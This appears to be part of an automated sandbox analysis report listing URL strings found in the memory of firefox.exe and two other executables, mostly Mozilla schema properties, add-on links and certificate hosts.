Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/insecureFallbackAMD
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isBestMatchExperiment
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isEnrollmentPaused
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isRollout
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/javascriptValidator
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties/additionalProperties
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/1
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/mdnFeatureGate
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/mdnFeatureGatehttp://mozilla.org/#/properties/merinoProvidershttp://
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/mediaExceptionsStrategy
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoClientVariants
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEnabled
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEndpointURL
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEndpointURLhttp://mozilla.org/#/properties/isBestMatchExperime
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoProviders
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoTimeoutMs
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/migrateExtensions
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/migrateExtensionshttp://mozilla.org/#/properties/aboutWelcomeBehavio
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/networkPredictorhttp://mozilla.org/#/properties/preconnect
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/networkPredictorhttp://mozilla.org/#/properties/preconnect0f7b2114-9
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/originsAlternativeEnable
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/originsDaysCutOff
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/priority
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/slug
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesAlternativeEnable
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesHalfLifeDays
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesHighWeight
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesLowWeight
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesMediumWeight
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesNumSampledVisits
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pocketFeatureGate
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pocketShowLessFrequentlyCap
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pocketShowLessFrequentlyCaphttp://mozilla.org/#/properties/quickSugg
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/proposedDurationhttp://mozilla.org/#/properties/localizations
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/proposedEnrollment
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestions
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestBlockingEnabled
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestBlockingEnabledhttps://services.addons.mozilla.org/api/v
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestDataCollectionEnabled
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestEnabled
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsNonSponsoredEnabled
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsNonSponsoredEnabledhttp://mozilla.org/#/pr
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabled
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredEnabled
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredEnabledhttp://mozilla.org/#/properties/quick
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredIndex
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestOnboardingDialogVariation
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsDataType
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsDataTypehttp://mozilla.org/#/properties/qu
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsEnabled
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScenario
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScenariohttp://mozilla.org/#/properties/merinoClientVari
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScoreMap
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScoreMapresource://gre/modules/PrivateBrowsingUtils.sys.
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestShouldShowOnboardingDialog
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestShouldShowOnboardingDialogSome
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestShowOnboardingDialogAfterNRestarts
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredEnabled
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredEnabledbrowser.safebrowsing.features.trackingAn
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredIndex
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/recordNavigationalSuggestionTelemetry
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/referenceBranch
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/richSuggestionsFeatureGate
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/schemaVersion
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/serpEventTelemetryEnabled
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showExposureResults
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showExposureResultshttp://mozilla.org/#/properties/pocketFeatureGate
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showImportAll
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showImportAllparent-store-update:csv-import-release-rolloutae36a32e-
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showPreferencesEntrypoint
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showPreferencesEntrypointresource://activity-stream/lib/ASRouterTarg
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showSearchTermsFeatureGate
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showSearchTermsFeatureGatehttp://mozilla.org/#/properties/originsAlt
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/slug
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/startDate
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/targeting
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/tlsEnabled
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/tlsEnabled851c8fcb-5763-bf89-813d-0f98cdd6f8c1
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/tlsGreaseProb
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/tlsGreaseProb6a3c05bb-f971-d3d4-2a02-184e6970ba87
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/trendingEnabled
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/trendingMaxResultsNoSearchMode
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/trendingRequireSearchMode
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/useNewWizard
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/useNewWizardformautofill
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/userFacingDescription
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/userFacingName
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherFeatureGate
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywords
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLength
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLengthCap
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLengthCaphttp://mozilla.org/#/properties/quick
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLengthresource://normandy/lib/PreferenceRollou
Source: firefox.exe, 00000024.00000002.2971880123.000001DF22259000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2938549798.000001DF1F1C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2421808761.000001DF1F093000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2913081779.000001DF1BB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2964896342.000001DF2107E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2864945025.000001DF1AB65000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2935278544.000001DF1ED03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2938549798.000001DF1F1CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2929954883.000001DF1E7D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: firefox.exe, 00000024.00000002.2544675991.0000015073B00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/sP
Source: file.exe, 00000000.00000003.1341423655.000000000582D000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2283971165.000000000573D000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2442693222.0000000005C21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.1341423655.000000000582D000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2283971165.000000000573D000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2442693222.0000000005C21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-update
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updateBITS_ACTIVE_NO_PROGRESS_TIMEOUT_SECSchrome://branding/locale/b
Source: firefox.exe, 00000024.00000002.2911908216.000001DF1B024000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2935722606.000001DF1EEA6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2911908216.000001DF1B0A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2964896342.000001DF2107E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2494215088.000001DF20967000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2910571192.000001DF1AFE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000024.00000002.2964896342.000001DF2107E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul.
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2494215088.000001DF20967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulCan
Source: firefox.exe, 00000024.00000002.2964896342.000001DF2107E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulc
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/AppMenuNotificat
Source: file.exe, 00000000.00000003.1341423655.000000000582D000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2283971165.000000000573D000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2442693222.0000000005C21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.1341423655.000000000582D000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2283971165.000000000573D000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2442693222.0000000005C21000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000024.00000003.2405355809.000001DF1EB40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000003.2405966297.000001DF1EB7F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: file.exe, 00000000.00000003.1315402793.0000000005769000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2257274069.0000000005747000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2257442357.0000000005744000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2403239780.0000000005C08000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2402973895.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.ca
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2956116951.000001DF20690000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 00000024.00000002.2967410154.000001DF21553000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/Webchannel
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com_fetchPaged/fetchNextPage/
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2913857704.000001DF1BC43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2926560740.000001DF1C8F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2796802534.000001DF1A7FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/en-US/firefox/collections/4757633/25c2b44583534b3fa8fea977c419cd/?page=1&
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2953297308.000001DF20284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/enhancer-for-youtube/
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2953297308.000001DF20284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/facebook-container/
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2953297308.000001DF20284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/reddit-enhancement-suite/
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2953297308.000001DF20284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/to-google-translate/
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2953297308.000001DF20284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/wikipedia-context-menu-search/
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4040738/cookie_autodelete-3.8.2.xpi
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4128570/languagetool-7.1.13.xpi
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4129240/privacy_badger17-2023.6.23.xpi
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4134489/enhancer_for_youtube-2.0.119.1.xpi
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4141092/facebook_container-2.3.11.xpi
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/506/506646-64.png?modified=mcrushed
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/700/700308-64.png?modified=4bc8e79f
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/708/708770-64.png?modified=4f881970
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/784/784287-64.png?modified=mcrushed
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/954/954390-64.png?modified=97d4c956
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2957011320.000001DF207C5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2949252169.000001DF1FF47000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2959294479.000001DF20A93000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2958766234.000001DF20912000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 00000024.00000002.2953297308.000001DF20284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://app.adjust.com/167k4ih?campaign=firefox-desktop&adgroup=pb&creative=focus-omc172&redirect=ht
Source: firefox.exe, 00000024.00000002.2953297308.000001DF20284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://app.adjust.com/a8bxj8j?campaign=firefox-desktop&adgroup=pb&creative=focus-omc172&redirect=ht
